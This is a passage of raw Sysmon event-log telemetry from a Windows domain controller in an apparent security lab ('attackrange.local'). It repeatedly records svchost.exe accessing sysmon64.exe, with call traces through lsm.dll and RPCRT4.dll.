13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 